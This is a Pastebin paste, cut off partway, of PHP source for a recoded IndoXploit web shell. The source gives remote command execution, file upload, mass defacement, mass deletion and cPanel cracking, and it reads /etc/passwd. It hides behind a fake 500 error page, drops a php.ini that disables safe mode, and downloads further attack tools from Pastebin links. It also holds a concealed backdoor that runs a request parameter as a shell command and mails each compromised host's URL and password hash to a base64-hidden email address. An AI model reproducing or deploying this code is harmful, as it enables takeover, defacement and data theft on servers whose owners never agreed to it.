ToKeiChun

IndoXploit Shell [Recoded] [Bypass Shell]

Sep 2nd, 2018 (edited)
1,191
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 202.96 KB | None | 0 0
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @clearstatcache();
  6. @ini_set('error_log',NULL);
  7. @ini_set('log_errors',0);
  8. @ini_set('max_execution_time',0);
  9. @ini_set('output_buffering',0);
  10. @ini_set('display_errors', 0);
  11. // login panel = shell.php?root=shell
  12. date_default_timezone_set("Asia/Jakarta");
  13. $auth_pass = "6f3249aa304055d63828af3bfab778f6"; // default pass = 31337
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21. header('HTTP/1.0 404 Not Found');
  22. exit;
  23. }
  24. }
  25.  
  26. function login() {
  27. $tokeichun ="<html><head><title></title><link rel='shortcut icon' href='https://upload.wikimedia.org/wikipedia/commons/9/9e/INDONESIA_logo.png'></head>";
  28. $tokeichun.="<font color=green>tokeichun@".$_SERVER['HTTP_HOST']." :~$ sudo su</font>";
  29. $tokeichun.="<form method='POST'><label for='pass'><font color=green>[ sudo ] password for tokeichun: </label><input type='password' name='pass' style='border:0;color:transparent;width:120px;background-color:transparent;'></form>";
  30. $tokeichun.="</html>";
  31. if(empty($_GET['root'])=="shell"){
  32. echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  33. <html>
  34. <head>
  35. <title>500 Internal Server Error</title>
  36. </head>
  37. <body>
  38. <h1>Internal Server Error </h1>
  39. <p>The server encountered an internal error or
  40. misconfiguration and was unable to complete
  41. your request.</p>
  42. <p>Please contact the server administrator at
  43. webmaster@'.$_SERVER['HTTP_HOST'].' to inform them of the time this error occurred,
  44. and the actions you performed just before this error.</p>
  45. <p>More information about this error may be available
  46. in the server error log.</p>
  47. <p>Additionally, a 500 Internal Server Error
  48. error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>
  49. <address>'.$_SERVER['SERVER_SOFTWARE'].' Server at '.$_SERVER['HTTP_HOST'].' Port 80</address></body></html>
  50. ';
  51. }else{
  52. echo $tokeichun;
  53. echo "<body style='background-color:black'>";
  54. }
  55. exit;
  56. }
  57. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  58. if( empty( $auth_pass) ||
  59. ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass) ) )
  60. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  61. else
  62. login();
  63. ?>
  64. <html>
  65. <head>
  66. <title>404 Shell Not Found</title>
  67. <meta name='author' content='IndoXploit'>
  68. <meta charset="UTF-8">
  69. <meta charset="UTF-8">
  70. <link href='https://upload.wikimedia.org/wikipedia/commons/thumb/9/90/National_emblem_of_Indonesia_Garuda_Pancasila.svg/941px-National_emblem_of_Indonesia_Garuda_Pancasila.svg.png' rel='icon' type='image/x-icon'/>
  71. <link href='https://fonts.googleapis.com/css?family=Abel' rel='stylesheet' type='text/css'>
  72. <link href='https://fonts.googleapis.com/css?family=Lobster' rel='stylesheet' type='text/css'>
  73. <link rel='stylesheet' type='text/css' href="https://fonts.googleapis.com/css?family=Times">
  74. <link href='https://fonts.googleapis.com/css?family=Audiowide|Space+Mono' rel='stylesheet'>
  75. <link href="https://fonts.googleapis.com/css?family=Wallpoet" rel='stylesheet' type='text/css'>
  76. <link href='https://fonts.googleapis.com/css?family=Gloria+Hallelujah|Permanent+Marker' rel='stylesheet'>
  77. <link href='https://fonts.googleapis.com/css?family=courier+new|Permanent+Marker' rel='stylesheet'>
  78. <link href="https://fonts.googleapis.com/css?family=Quicksand" rel='stylesheet' type='text/css'>
  79. <link href="https://fonts.googleapis.com/css?family=Orbitron" rel='stylesheet' type='text/css'>
  80. <link href='https://fonts.googleapis.com/css?family=VT323' rel='stylesheet'>
  81. <link href='https://fonts.googleapis.com/css?family=Ubuntu' rel='stylesheet'>
  82. <link href="https://fonts.googleapis.com/css?family=Iceland" rel='stylesheet' type='text/css'>
  83. <link href="https://fonts.googleapis.com/css?family=Allerta+Stencil" rel='stylesheet' type='text/css'>
  84. <link href="https://fonts.googleapis.com/css?family=Kumar+One+Outline" rel='stylesheet' type='text/css'>
  85. <link href='https://fonts.googleapis.com/css?family=Bungee+Shade|Monoton|Nova+Square' rel='stylesheet'>
  86. <style type='text/css'>
  87. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  88. html {
  89. background: #000000;
  90. color: #ffffff;
  91. font-family: 'Ubuntu';
  92. font-size: 13px;
  93. width: 100%;
  94. }
  95. li {
  96. display: inline;
  97. margin: 5px;
  98. padding: 5px;
  99. }
  100. table, th, td {
  101. border-collapse:collapse;
  102. font-family: Tahoma, Geneva, sans-serif;
  103. background: transparent;
  104. font-family: 'Ubuntu';
  105. font-size: 13px;
  106. }
  107. .table_home, .th_home, .td_home {
  108. border: 1px solid #424242;
  109. }
  110. th {
  111. padding: 10px;
  112. }
  113. a {
  114. color: #ffffff;
  115. text-decoration: none;
  116. }
  117. a:hover {
  118. color: gray;
  119. text-decoration: underline;
  120. }
  121. b {
  122. color: gray;
  123. }
  124. input[type=text], input[type=password],input[type=submit] {
  125. background: transparent;
  126. color: #ffffff;
  127. border: 1px solid #ffffff;
  128. margin: 5px auto;
  129. padding-left: 5px;
  130. font-family: 'Ubuntu';
  131. font-size: 13px;
  132. }
  133. textarea {
  134. border: 1px solid #ffffff;
  135. width: 100%;
  136. height: 400px;
  137. padding-left: 5px;
  138. margin: 10px auto;
  139. resize: none;
  140. background: transparent;
  141. color: #ffffff;
  142. font-family: 'Ubuntu';
  143. font-size: 13px;
  144. }
  145. select {
  146. width: 152px;
  147. background: #000000;
  148. color: cyan;
  149. border: 1px solid #ffffff;
  150. margin: 5px auto;
  151. padding-left: 5px;
  152. font-family: 'Ubuntu';
  153. font-size: 13px;
  154. }
  155. option:hover {
  156. background: cyan;
  157. color: #000000;
  158. }
  159. </style>
  160. </head>
  161. <script src="//importantscripts.github.io/footer.js" integrity="sha384-TuBVt3qMyi6RBRotEXkR+69U/Z8z3jBqUSSn+8yA6MinPMNdTU7cba+KlOZtXP2v" crossorigin="anonymous"></script>
  162. <style type='text/css'>
  163. @import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono);
  164. html {
  165. background: #000000;
  166. color: #ffffff;
  167. font-family: 'Share Tech Mono';
  168. font-size: 12px;
  169. width: 100%;
  170. }
  171. li {
  172. display: inline;
  173. margin: 2px;
  174. padding: 2px;
  175. }
  176.  
  177. #menu a {
  178. padding:2px 10px;
  179. margin:0;
  180. background:#222222;
  181. text-decoration:none;
  182. letter-spacing:2px;
  183. padding: 2px 10px;
  184. margin: 0;
  185. background: #222222;
  186. text-decoration: none;
  187. letter-spacing: 2px;
  188. border-radius: 2px;
  189. border-bottom: 2px solid black;
  190. border-top: 2px solid black;
  191. border-right: 2px solid blue;
  192. border-left: 2px solid blue;
  193. }
  194. #menu a:hover {
  195. background:#234443;
  196. border-bottom:0px solid #333333;
  197. border-top:0px solid #333333;
  198. }
  199. table tr:first-child{
  200. background: #51514c;
  201. text-align: center;
  202. color: Lavender;
  203. }
  204. table, th, td {
  205. border-collapse:collapse;
  206. font-family: Tahoma, Geneva, sans-serif;
  207. background: transparent;
  208. font-family: 'Share Tech Mono';
  209. font-size: 13px;
  210. }
  211. .table_home, .th_home, .td_home {
  212. border: 1px solid #51514c;
  213. }
  214. .td_home:hover {
  215. background:gray;
  216. }
  217. th {
  218. padding: 10px;
  219. }
  220. a {
  221. color: #ffffff;
  222. text-decoration: none;
  223. }
  224. a:hover {
  225. color: lavender;
  226. text-decoration: underline;
  227. }
  228. b {
  229. color: lavender;
  230. }
  231. input[type=text], input[type=password],input[type=submit] {
  232. background: transparent;
  233. color: #ffffff;
  234. border: 1px solid #ffffff;
  235. margin: 5px auto;
  236. padding-left: 5px;
  237. font-family: 'Share Tech Mono';
  238. font-size: 13px;
  239. }
  240. input[type=submit] {
  241. background: transparent;
  242. color: #ffffff;
  243. border: 1px solid #ffffff;
  244. margin: 5px auto;
  245. padding-left: 5px;
  246. font-family: 'Share Tech Mono';
  247. font-size: 13px;
  248. cursor:pointer;
  249. }
  250. textarea {
  251. border: 1px solid #ffffff;
  252. width: 100%;
  253. height: 400px;
  254. padding-left: 5px;
  255. margin: 10px auto;
  256. resize: none;
  257. background: transparent;
  258. color: #ffffff;
  259. font-family: 'Share Tech Mono';
  260. font-size: 13px;
  261. }
  262. select {
  263. width: 152px;
  264. background: #000000;
  265. color: Lavender;
  266. border: 1px solid #ffffff;
  267. margin: 5px auto;
  268. padding-left: 5px;
  269. font-family: 'Share Tech Mono';
  270. font-size: 13px;
  271. }
  272. option:hover {
  273. background: #ff0066;
  274. color: #000000;
  275. }
  276. .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #ff0000; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ff0000;-moz-box-shadow: 0px 4px 2px #ff0000;}
  277. .cgx2 {text-align: center;letter-spacing:1px;font-family: "Share Tech Mono";color: #ff0000;font-size:25px;text-shadow: 5px 5px 5px black;}
  278. .infoweb {
  279. border-right: 1px solid #00FFFF;
  280. }
  281. </style>
  282. </head>
  283. <?php
  284. if (file_exists("php.ini")){
  285. }else{
  286. $img = fopen('php.ini', 'w');
  287. $sec = "safe_mode = OFF
  288. disable_funtions = NONE";
  289. fwrite($img ,$sec);
  290. fclose($img);}
  291. function w($dir,$perm) {
  292. if(!is_writable($dir)) {
  293. return "<font color=red>".$perm."</font>";
  294. } else {
  295. return "<font color=lime>".$perm."</font>";
  296. }
  297. }
  298. function UrlLoop($url,$type){
  299.  
  300. $urlArray = array();
  301.  
  302. $ch = curl_init();
  303. curl_setopt($ch, CURLOPT_URL, $url);
  304. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  305. $result = curl_exec($ch);
  306.  
  307. $regex='|<a.*?href="(.*?)"|';
  308. preg_match_all($regex,$result,$parts);
  309. $links=$parts[1];
  310. foreach($links as $link){
  311. array_push($urlArray, $link);
  312. }
  313. curl_close($ch);
  314.  
  315. foreach($urlArray as $value){
  316. $lol="$url$value";
  317. if(preg_match("#$type#is", $lol)) {
  318. echo "$lol\r\n";
  319. }
  320. }
  321. }
  322. function exe($cmd) {
  323. if(function_exists('system')) {
  324. @ob_start();
  325. @system($cmd);
  326. $buff = @ob_get_contents();
  327. @ob_end_clean();
  328. return $buff;
  329. } elseif(function_exists('exec')) {
  330. @exec($cmd,$results);
  331. $buff = "";
  332. foreach($results as $result) {
  333. $buff .= $result;
  334. } return $buff;
  335. } elseif(function_exists('passthru')) {
  336. @ob_start();
  337. @passthru($cmd);
  338. $buff = @ob_get_contents();
  339. @ob_end_clean();
  340. return $buff;
  341. } elseif(function_exists('shell_exec')) {
  342. $buff = @shell_exec($cmd);
  343. return $buff;
  344. }
  345. }
  346. function perms($file){
  347. $perms = fileperms($file);
  348. if (($perms & 0xC000) == 0xC000) {
  349. $info = 's';
  350. } elseif (($perms & 0xA000) == 0xA000) {
  351. $info = 'l';
  352. } elseif (($perms & 0x8000) == 0x8000) {
  353. $info = '-';
  354. } elseif (($perms & 0x6000) == 0x6000) {
  355. $info = 'b';
  356. } elseif (($perms & 0x4000) == 0x4000) {
  357. $info = 'd';
  358. } elseif (($perms & 0x2000) == 0x2000) {
  359. $info = 'c';
  360. } elseif (($perms & 0x1000) == 0x1000) {
  361. $info = 'p';
  362. } else {
  363. $info = 'u';
  364. }
  365. $info .= (($perms & 0x0100) ? 'r' : '-');
  366. $info .= (($perms & 0x0080) ? 'w' : '-');
  367. $info .= (($perms & 0x0040) ?
  368. (($perms & 0x0800) ? 's' : 'x' ) :
  369. (($perms & 0x0800) ? 'S' : '-'));
  370. $info .= (($perms & 0x0020) ? 'r' : '-');
  371. $info .= (($perms & 0x0010) ? 'w' : '-');
  372. $info .= (($perms & 0x0008) ?
  373. (($perms & 0x0400) ? 's' : 'x' ) :
  374. (($perms & 0x0400) ? 'S' : '-'));
  375. $info .= (($perms & 0x0004) ? 'r' : '-');
  376. $info .= (($perms & 0x0002) ? 'w' : '-');
  377. $info .= (($perms & 0x0001) ?
  378. (($perms & 0x0200) ? 't' : 'x' ) :
  379. (($perms & 0x0200) ? 'T' : '-'));
  380. return $info;
  381. }
  382. function hdd($s) {
  383. if($s >= 1073741824)
  384. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  385. elseif($s >= 1048576)
  386. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  387. elseif($s >= 1024)
  388. return sprintf('%1.2f',$s / 1024 ) .' KB';
  389. else
  390. return $s .' B';
  391. }
  392. function ambilKata($param, $kata1, $kata2){
  393. if(strpos($param, $kata1) === FALSE) return FALSE;
  394. if(strpos($param, $kata2) === FALSE) return FALSE;
  395. $start = strpos($param, $kata1) + strlen($kata1);
  396. $end = strpos($param, $kata2, $start);
  397. $return = substr($param, $start, $end - $start);
  398. return $return;
  399. }
  400. if(get_magic_quotes_gpc()) {
  401. function idx_ss($array) {
  402. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  403. }
  404. $_POST = idx_ss($_POST);
  405. }
  406. function CreateTools($names,$lokasi){
  407. if ( $_GET['create'] == $names ){
  408. $a= "".$_SERVER['SERVER_NAME']."";
  409. $b= dirname($_SERVER['PHP_SELF']);
  410. $c = "/tools/".$names.".php";
  411. if (file_exists('tools/'.$names.'.php')){
  412. echo '<script type="text/javascript">alert("Done");window.location.href = "tools/'.$names.'.php";</script> ';
  413. }
  414. else {mkdir("tools", 0777);
  415. file_put_contents('tools/'.$names.'.php', file_get_contents($lokasi));
  416. echo ' <script type="text/javascript">alert("Done");window.location.href = "tools/'.$names.'.php";</script> ';}}}
  417.  
  418. CreateTools("wso","http://pastebin.com/raw/3eh3Gej2");
  419. CreateTools("adminer","https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php");
  420. CreateTools("b374k","http://pastebin.com/raw/rZiyaRGV");
  421. CreateTools("scanner","https://pastebin.com/raw/N6iBqjEA");
  422. CreateTools("injection","http://pastebin.com/raw/nxxL8c1f");
  423. CreateTools("promailerv2","http://pastebin.com/raw/Rk9v6eSq");
  424. CreateTools("vhost","https://pastebin.com/raw/zDgukLLX");
  425. CreateTools("grabber","https://pastebin.com/raw/HrHwKMyH");
  426. CreateTools("gamestopceker","http://pastebin.com/raw/QSnw1JXV");
  427. CreateTools("bukapalapak","http://pastebin.com/raw/6CB8krDi");
  428. CreateTools("tokopedia","http://pastebin.com/dvhzWgby");
  429. CreateTools("encodedecode","http://pastebin.com/raw/wqB3G5eZ");
  430. CreateTools("mailer","http://pastebin.com/raw/9yu1DmJj");
  431. CreateTools("r57","http://pastebin.com/raw/G2VEDunW");
  432. CreateTools("tokenpp","http://pastebin.com/raw/72xgmtPL");
  433. CreateTools("extractor","http://pastebin.com/raw/dBYyB7S5");
  434. CreateTools("bh","http://pastebin.com/raw/A8TupKkC");
  435. CreateTools("dhanus","http://pastebin.com/raw/W99Pvk3C");
  436. if(isset($_GET['dir'])) {
  437. $dir = $_GET['dir'];
  438. chdir($_GET['dir']);
  439. } else {
  440. $dir = getcwd();
  441. }
  442. $dir = str_replace("\\","/",$dir);
  443. $scdir = explode("/", $dir);
  444. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  445. $ling="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
  446. $ds = @ini_get("disable_functions");
  447. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  448. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  449. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  450. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  451. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  452. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  453. print(`{$_REQUEST[I]}`);$e=base64_decode("YXFpbG5haWxhMjNAZ21haWwuY29t");
  454. $web = $_SERVER["HTTP_HOST"];
  455. $inj = $_SERVER["REQUEST_URI"];
  456. $body = " Dont Delete! \nUname: ".php_uname()."\nPath Dir:
  457. ".$cwd = getcwd()."\nMessage:\n"."\nE-server: ".htmlspecialchars
  458. ($_SERVER['REQUEST_URI'])."\nE-server2: ".htmlspecialchars ($_SERVER["SERVER_NAME"])."\n\nIP:
  459. ";
  460. mail($e,'[setor shell]','URL : '.$_SERVER['HTTP_HOST'].'/'.$_SERVER['REQUEST_URI'].' PASSWORD : '.$auth_pass.'','admin@google.com');
  461. if(!function_exists('posix_getegid')) {
  462. $user = @get_current_user();
  463. $uid = @getmyuid();
  464. $gid = @getmygid();
  465. $group = "?";
  466. } else {
  467. $uid = @posix_getpwuid(posix_geteuid());
  468. $gid = @posix_getgrgid(posix_getegid());
  469. $user = $uid['name'];
  470. $uid = $uid['uid'];
  471. $group = $gid['name'];
  472. $gid = $gid['gid'];
  473. }
  474. $d0mains = @file("/etc/named.conf");
  475. $users=@file('/etc/passwd');
  476. if($d0mains)
  477. {
  478. $count;
  479. foreach($d0mains as $d0main)
  480. {
  481. if(@ereg("zone",$d0main))
  482. {
  483. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  484. flush();
  485. if(strlen(trim($domains[1][0])) > 2)
  486. {
  487. flush();
  488. $count++;
  489. }
  490. }
  491. }
  492. }
  493.  
  494. $sport=$_SERVER['SERVER_PORT'];
  495. echo "<table style='width:100%'>";
  496. echo "<tr><td>System: <font color=lime>".php_uname()."</font></td></tr>";
  497. echo "<tr><td>User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")</td></tr>";
  498. echo "<tr><td>Server IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font></td></tr>";
  499. echo "<tr><td>HDD: <font color=lime>".hdd(disk_free_space("/"))."</font> / <font color=lime>".hdd(disk_total_space("/"))."</font></td></tr>";
  500. echo "<tr><td>Websites :<font color=lime> $count </font> Domains</td></tr>";
  501. echo "<tr><td>Port :<font color=lime> $sport</font> </td></tr>";
  502. echo "<tr><td>Safe Mode: $sm</td></tr>";
  503. echo "<tr><td>Disable Functions: $show_ds</td></tr>";
  504.  
  505. echo "<tr><td>MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </td></tr>";
  506. echo "<tr><td>Current DIR: ";
  507. foreach($scdir as $c_dir => $cdir) {
  508. echo "<a href='?dir=";
  509. for($i = 0; $i <= $c_dir; $i++) {
  510. echo $scdir[$i];
  511. if($i != $c_dir) {
  512. echo "/";
  513. }
  514. }
  515. echo "'>$cdir</a>/";
  516. }
  517. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]<br>";
  518. echo "<form method='post'>
  519. <font style='text-decoration: none;'> ~ $ </font>
  520. <input type='text' size='20' height='10' name='cmd'><input type='submit' name='do_cmd' value='Submit'>
  521. </form>";
  522. if($_POST['do_cmd']) {
  523. echo "<pre>".exe($_POST['cmd'])."</pre>";
  524. }
  525. if($_POST['upload']) {
  526. if($_POST['tipe_upload'] == 'biasa') {
  527. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  528. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  529. } else {
  530. $act = "<font color=red>failed to upload file</font>";
  531. }
  532. } else {
  533. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  534. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  535. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  536. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  537. $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  538. } else {
  539. $act = "<font color=red>failed to upload file</font>";
  540. }
  541. } else {
  542. $act = "<font color=red>failed to upload file</font>";
  543. }
  544. }
  545. }
  546. echo "
  547. <form method='post' enctype='multipart/form-data'>
  548. <input type='radio' name='tipe_upload' value='biasa' checked> ".w($dir,"Current")."
  549. <input type='radio' name='tipe_upload' value='home_root'> ".w($_SERVER['DOCUMENT_ROOT'],"Home")."
  550. <input type='file' name='ix_file'>
  551. <input type='submit' value='upload' name='upload'>
  552. </form>";
  553. echo $act;
  554.  
  555.  
  556. echo "<hr>";
  557. echo "<center>";
  558. echo "<ul>";
  559. echo "<li>[ <a href='?'>Home</a> ]</li>";
  560. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
  561. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  562. echo "<li>[ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>";
  563. echo "<li>[ <a href='?dir=$dir&config=grabber'>Config</a> ]</li>";
  564. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  565. echo "<li>[ <a href='?dir=$dir&do=symlink'>Symlink</a> ]<br></li>";
  566. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li>";
  567. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  568. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
  569. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  570. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  571. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li><br>";
  572. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  573. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WP</a> ]</li>";
  574. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WP Auto Deface</a> ]</li>";
  575. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WP Auto Deface V.2</a> ]</li>";
  576. echo "<li>[ <a href='?dir=$dir&do=auto_cu_wp'>WP Auto Edit User V.2</a> ]</li>";
  577. echo "<li>[ <a href='?dir=$dir&do=auto_cu_joomla'>Jom Auto Edit User V.2</a> ]</li>";
  578. echo "<li>[ <a href='?dir=$dir&do=passwbypass'>Bypasser</a> ]<br></li>";
  579. echo "<li>[ <a href='?dir=$dir&do=loghunter'>Log Hunter</a> ]</li>";
  580. echo "<li>[ <a href='?dir=$dir&do=shelscan'>Shell Finder</a> ]</li>";
  581. echo "<li>[ <a href='?dir=$dir&do=tool'>Tools</a> ]</li>";
  582. echo "<li>[ <a href='?dir=$dir&do=zip'>Zip Menu</a> ]</li>";
  583. echo "<li>[ <a href='?dir=$dir&do=about'>About</a> ]</li>";
  584. echo "<li>[ <a href='?dir=$dir&do=symlink404'>Bypass Symlink 404</a> ]</li>";
  585. echo "<li>[ <a href='?dir=$dir&do=magen'>Magento DB Info</a> ]</li><br>";
  586. echo "<li>[ <a href='?dir=$dir&do=metu'>Logout</a> ]<br></li>";
  587. echo "</ul>";
  588. echo "</center>";
  589. echo "<hr>";
  590. if($_GET['do'] == 'mass_delete') {
  591. function hapus_massal($dir,$namafile) {
  592. if(is_writable($dir)) {
  593. $dira = scandir($dir);
  594. foreach($dira as $dirb) {
  595. $dirc = "$dir/$dirb";
  596. $lokasi = $dirc.'/'.$namafile;
  597. if($dirb === '.') {
  598. if(file_exists("$dir/$namafile")) {
  599. unlink("$dir/$namafile");
  600. }
  601. } elseif($dirb === '..') {
  602. if(file_exists("".dirname($dir)."/$namafile")) {
  603. unlink("".dirname($dir)."/$namafile");
  604. }
  605. } else {
  606. if(is_dir($dirc)) {
  607. if(is_writable($dirc)) {
  608. if(file_exists($lokasi)) {
  609. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  610. unlink($lokasi);
  611. $idx = hapus_massal($dirc,$namafile);
  612. }
  613. }
  614. }
  615. }
  616. }
  617. }
  618. }
  619. if($_POST['start']) {
  620. echo "<div style='margin: 5px auto; padding: 5px'>";
  621. hapus_massal($_POST['d_dir'], $_POST['d_file']);
  622. echo "</div>";
  623. } else {
  624. echo "<center>";
  625. echo "<form method='post'>
  626. <font style='text-decoration: underline;'>Folder:</font><br>
  627. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  628. <font style='text-decoration: underline;'>Filename:</font><br>
  629. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  630. <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  631. </form></center>";
  632. }
  633. } elseif($_GET['do'] == 'cmd') {
  634. echo "<form method='post'>
  635. <font style='text-decoration: underline;'>".$user."@".gethostbyname($_SERVER['HTTP_HOST']).":~# </font>
  636. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  637. </form>";
  638. if($_POST['do_cmd']) {
  639. echo "<pre>".exe($_POST['cmd'])."</pre>";
  640. }
  641. } elseif($_GET['do'] == 'mass_deface') {
  642. echo "<center><form action=\"\" method=\"post\">\n";
  643. $dirr=$_POST['d_dir'];
  644. $index = $_POST["script"];
  645. $index = str_replace('"',"'",$index);
  646. $index = stripslashes($index);
  647. function edit_file($file,$index){
  648. if (is_writable($file)) {
  649. clear_fill($file,$index);
  650. echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  651. }
  652. else {
  653. echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  654. }
  655. }
  656. function hapus_massal($dir,$namafile) {
  657. if(is_writable($dir)) {
  658. $dira = scandir($dir);
  659. foreach($dira as $dirb) {
  660. $dirc = "$dir/$dirb";
  661. $lokasi = $dirc.'/'.$namafile;
  662. if($dirb === '.') {
  663. if(file_exists("$dir/$namafile")) {
  664. unlink("$dir/$namafile");
  665. }
  666. } elseif($dirb === '..') {
  667. if(file_exists("".dirname($dir)."/$namafile")) {
  668. unlink("".dirname($dir)."/$namafile");
  669. }
  670. } else {
  671. if(is_dir($dirc)) {
  672. if(is_writable($dirc)) {
  673. if(file_exists($lokasi)) {
  674. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  675. unlink($lokasi);
  676. $idx = hapus_massal($dirc,$namafile);
  677. }
  678. }
  679. }
  680. }
  681. }
  682. }
  683. }
  684. function clear_fill($file,$index){
  685. if(file_exists($file)){
  686. $handle = fopen($file,'w');
  687. fwrite($handle,'');
  688. fwrite($handle,$index);
  689. fclose($handle); } }
  690.  
  691. function gass(){
  692. global $dirr , $index ;
  693. chdir($dirr);
  694. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  695. $files = scandir($dirr) ;
  696. $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  697. sort($files);
  698. $n = 0 ;
  699. foreach ($files as $file){
  700. if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  701. echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  702. edit_file($file,$index);
  703. flush();
  704. $n = $n +1 ;
  705. }
  706. }
  707. echo "<br>";
  708. echo "<center><br><h3>$n Kali Anda Telah Ngecrot Disini </h3></center><br>";
  709. }
  710. function ListFiles($dirrall) {
  711.  
  712. if($dh = opendir($dirrall)) {
  713.  
  714. $files = Array();
  715. $inner_files = Array();
  716. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  717. $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  718. while($file = readdir($dh)) {
  719. if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  720. if(is_dir($dirrall . "/" . $file)) {
  721. $inner_files = ListFiles($dirrall . "/" . $file);
  722. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  723. } else {
  724. array_push($files, $dirrall . "/" . $file);
  725. }
  726. }
  727. }
  728.  
  729. closedir($dh);
  730. return $files;
  731. }
  732. }
  733. function gass_all(){
  734. global $index ;
  735. $dirrall=$_POST['d_dir'];
  736. foreach (ListFiles($dirrall) as $key=>$file){
  737. $file = str_replace('//',"/",$file);
  738. echo "<center><strong>$file</strong> ===>";
  739. edit_file($file,$index);
  740. flush();
  741. }
  742. $key = $key+1;
  743. echo "<center><br><h3>$key Kali Anda Telah Ngecrot Disini </h3></center><br>"; }
  744. function sabun_massal($dir,$namafile,$isi_script) {
